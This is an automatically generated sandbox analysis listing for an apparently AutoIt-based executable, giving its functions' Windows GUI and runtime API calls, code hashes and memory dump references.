                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 50ed00dac2763e665b869a6bd402a244aef5553c3fd9225b2918285c99d1b90a
                • Instruction ID: 4f2f44af654d8ce2b72fc08cfb39373cff8d42feef0d56fcaffe39d3913f781d
                • Opcode Fuzzy Hash: 50ed00dac2763e665b869a6bd402a244aef5553c3fd9225b2918285c99d1b90a
                • Instruction Fuzzy Hash: C00184B22056557EF7212778ACC2F2BA68DDF62378B3543B7B521613D1FA608C404570
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C022B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 00C022D7
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C022E9
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C022FF
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C0231A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: f8a75b764bb567eeef0c00ea8b7c8d3d79d6559404c52d819a69695c0893ef25
                • Instruction ID: d5b75ab6ae2f70dc2cc9408d1786365db7628b29e5ac0e281a04ca470dbdb6e1
                • Opcode Fuzzy Hash: f8a75b764bb567eeef0c00ea8b7c8d3d79d6559404c52d819a69695c0893ef25
                • Instruction Fuzzy Hash: 5B11093A900218FFEB119BA5CD85F9DFBB8EB08750F200091EA11B7290D6716E10DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C3A852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA2441: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA2452
                • GetClientRect.USER32 ref: 00C3A890
                • GetCursorPos.USER32(?), ref: 00C3A89A
                • ScreenToClient.USER32 ref: 00C3A8A5
                • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00C3A8D9
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Client$CursorLongProcRectScreenWindow
                • String ID:
                • API String ID: 4127811313-0
                • Opcode ID: 2aecbfdec3813a376c3b15fc4fa9b58a23f65a8c2d72838406b3ac8802b36042
                • Instruction ID: 080d7cd34a9f9f8ac296251829a2311315d907845d1c1098b9f22074104ffd38
                • Opcode Fuzzy Hash: 2aecbfdec3813a376c3b15fc4fa9b58a23f65a8c2d72838406b3ac8802b36042
                • Instruction Fuzzy Hash: BE111872911119FFDF14EF98D845AEE77B8FB05300F104555F962E3190D730AA92DBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C38773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32 ref: 00C38792
                • ScreenToClient.USER32 ref: 00C387AA
                • ScreenToClient.USER32 ref: 00C387CE
                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C387E9
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                • Opcode ID: 98dd3380eb5d3a851c78295ba6389a36e485ab65c628f0a0ab8ec20c488b1d06
                • Instruction ID: e5b53314e27473b54edcbceadb82c8f827adafce9c0dfb80dfa70444628038ec
                • Opcode Fuzzy Hash: 98dd3380eb5d3a851c78295ba6389a36e485ab65c628f0a0ab8ec20c488b1d06
                • Instruction Fuzzy Hash: 9A1140B9D00209EFDB41CFA8D885AEEBBB5FB08310F108166E925E3210D735AA558F50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C391C2 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA1ED9: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA1F33
                  • Part of subcall function 00BA1ED9: SelectObject.GDI32(?,00000000), ref: 00BA1F42
                  • Part of subcall function 00BA1ED9: BeginPath.GDI32(?), ref: 00BA1F59
                  • Part of subcall function 00BA1ED9: SelectObject.GDI32(?,00000000), ref: 00BA1F82
                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C391E6
                • LineTo.GDI32(?,?,?), ref: 00C391F3
                • EndPath.GDI32(?), ref: 00C39203
                • StrokePath.GDI32(?), ref: 00C39211
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                • String ID:
                • API String ID: 1539411459-0
                • Opcode ID: 211cb7b543c9d3dcff6ea58cbc39292b3ba4d806245f5581085f03f85b8c338e
                • Instruction ID: ee5b704c2b2c73d5741ae5b10ed4c024404e6d94ef3e46aa5e53194f30d710f2
                • Opcode Fuzzy Hash: 211cb7b543c9d3dcff6ea58cbc39292b3ba4d806245f5581085f03f85b8c338e
                • Instruction Fuzzy Hash: 1DF05E31055659BBDB126F54AC0DFCE3F69AF06711F048100FA12250E2C7B55661CBE9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA2150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                Download Yara Rule
                APIs
                • GetSysColor.USER32(00000008), ref: 00BA216C
                • SetTextColor.GDI32(?,?), ref: 00BA2176
                • SetBkMode.GDI32(?,00000001), ref: 00BA2189
                • GetStockObject.GDI32(00000005), ref: 00BA2191
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Color$ModeObjectStockText
                • String ID:
                • API String ID: 4037423528-0
                • Opcode ID: fd2823e93c732163aa6fbe1b40c70672f9540bc1f1ff08d8f83b339ab177f0b2
                • Instruction ID: 4a130110b04979afb8193401cb62af1d6ca490d933b1c62607ea983246475294
                • Opcode Fuzzy Hash: fd2823e93c732163aa6fbe1b40c70672f9540bc1f1ff08d8f83b339ab177f0b2
                • Instruction Fuzzy Hash: 75E06D31254280AFDB215B79BC09BEC7BA0EB12736F048259F6BB590E0C3B246409B10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BCE60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                Download Yara Rule
                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 00BCE69D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: 39612269ad46f37d241185b7e5043c0e270e1420b12676f88db903d6e66f417e
                • Instruction ID: edb2b436355656be3c3c2fc81e899c814db1e742b75a4ed273d0d667c820169b
                • Opcode Fuzzy Hash: 39612269ad46f37d241185b7e5043c0e270e1420b12676f88db903d6e66f417e
                • Instruction Fuzzy Hash: 5C514761A19101D6DB117B14DD42B6EBBE4FB50702F3089EEE0A5423A8FF35CC9A9B46
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BBA86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: 4a30864edbca2c97677ca788dd9bd3f01f7dd9a0ab302438e6eac6e5d69b826e
                • Instruction ID: f0cad7c4c30d7d0a6e489369530929be4624ca36a712bc474bf55d2c6306123a
                • Opcode Fuzzy Hash: 4a30864edbca2c97677ca788dd9bd3f01f7dd9a0ab302438e6eac6e5d69b826e
                • Instruction Fuzzy Hash: A651203490824A9FCF25DF28C481AFABBE0EF16310F6840D5E9919B3D0DB709D4ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C260A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: BuffCharUpper_wcslen
                • String ID: CALLARGARRAY
                • API String ID: 157775604-1150593374
                • Opcode ID: 81f5443c2768d9a26aeec3c91173a045e16d2d914afcfa1bc0f24bb19b88c431
                • Instruction ID: f1eed0bebbfb26675070a67bd5f66843268a5ee15e489086f811b817ad639503
                • Opcode Fuzzy Hash: 81f5443c2768d9a26aeec3c91173a045e16d2d914afcfa1bc0f24bb19b88c431
                • Instruction Fuzzy Hash: DB41C271A002299FCF04DFA9D8819FEBBF5FF59320F144169E416A7292D770AE91CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C3406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA771B: CreateWindowExW.USER32 ref: 00BA7759
                  • Part of subcall function 00BA771B: GetStockObject.GDI32(00000011), ref: 00BA776D
                  • Part of subcall function 00BA771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA7777
                • GetWindowRect.USER32 ref: 00C340D9
                • GetSysColor.USER32(00000012), ref: 00C340F3
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$ColorCreateMessageObjectRectSendStock
                • String ID: static
                • API String ID: 1983116058-2160076837
                • Opcode ID: 7fc09341dee573a85dcc752159ffb3aa009ae7baf1d4b8cb4e48c013e09b8727
                • Instruction ID: 41c451166e4ec2b5144ed09b7956321771669dc3a92535ead549a65b25746edb
                • Opcode Fuzzy Hash: 7fc09341dee573a85dcc752159ffb3aa009ae7baf1d4b8cb4e48c013e09b8727
                • Instruction Fuzzy Hash: 6B112972620209AFDF05DFA8DC46AEE7BB8FB08314F004925F955E3150E675E851DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C025DC
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: b52adefc520382151ef7c84cd2bfc71d5858b808232d9a552ee895b8bf6958f6
                • Instruction ID: b09b6f1a5599d798d7a7456d89208b33dc12a5e243338acfcbb0de9e6efe4445
                • Opcode Fuzzy Hash: b52adefc520382151ef7c84cd2bfc71d5858b808232d9a552ee895b8bf6958f6
                • Instruction Fuzzy Hash: F801D471604229BBCB28EBA4CC65DFE77A9AF56310B040619B872972D7EA309908D654
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C02468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C024D6
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: 8139e2929aab15bee245b9f4ecdb667cecc6972222076b36b4945cdea671bcf5
                • Instruction ID: 5c7dd2079e0c40805853e8a2f399a1c1f407bac65bb18d2e071d8cda73ae8672
                • Opcode Fuzzy Hash: 8139e2929aab15bee245b9f4ecdb667cecc6972222076b36b4945cdea671bcf5
                • Instruction Fuzzy Hash: 3A01A271A44109BBDF28EBA0CC56FFF77E99F56340F14002AA552632C7DA509E08D671
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C024EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C02558
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: 5be22e96e4208d2cf8100dbf0d06d6cec35d50a4c6aa3f32d3061d1af1e72ee6
                • Instruction ID: 934274580afe522449ec1ebae361f13eea13653450e499d10b56e63a6fc3dc46
                • Opcode Fuzzy Hash: 5be22e96e4208d2cf8100dbf0d06d6cec35d50a4c6aa3f32d3061d1af1e72ee6
                • Instruction Fuzzy Hash: A201A271644109B7CB24EBA4CD5AFFF77EC9B12740F1400257952A32C2EA249F08D675
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C025F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C02663
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                • Opcode ID: e796087f8a55d389720c398764d70ec9252dba90d01b849230c9154a626ab4b2
                • Instruction ID: 54f144fee9a8eb74661abc2e719c47310e1d718f1a50187e29a48c40988d5a1f
                • Opcode Fuzzy Hash: e796087f8a55d389720c398764d70ec9252dba90d01b849230c9154a626ab4b2
                • Instruction Fuzzy Hash: 8EF0A471A44219B7CB24E7A48C56FFF77B8AF12710F040A26B572A32C7DB615908D250
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C013A5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                Download Yara Rule
                APIs
                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C013B3
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Message
                • String ID: AutoIt$Error allocating memory.
                • API String ID: 2030045667-4017498283
                • Opcode ID: a66e0d76d364d5d950e6c29eec52a93caa8d6e3d612369ef0a035a74f49de916
                • Instruction ID: 2f9b2d153e743f2aaafd15ef18895b11841c73aa4b291f6937e3eed5d74b7061
                • Opcode Fuzzy Hash: a66e0d76d364d5d950e6c29eec52a93caa8d6e3d612369ef0a035a74f49de916
                • Instruction Fuzzy Hash: 28E0DF3226832826D6203794BC07F89B7C88F09B21F15046AFB5D788C28EE224904299
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BC10D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BBFAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BC1102,?,?,?,00BA100A), ref: 00BBFAE7
                • IsDebuggerPresent.KERNEL32(?,?,?,00BA100A), ref: 00BC1106
                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA100A), ref: 00BC1115
                Strings
                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BC1110
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
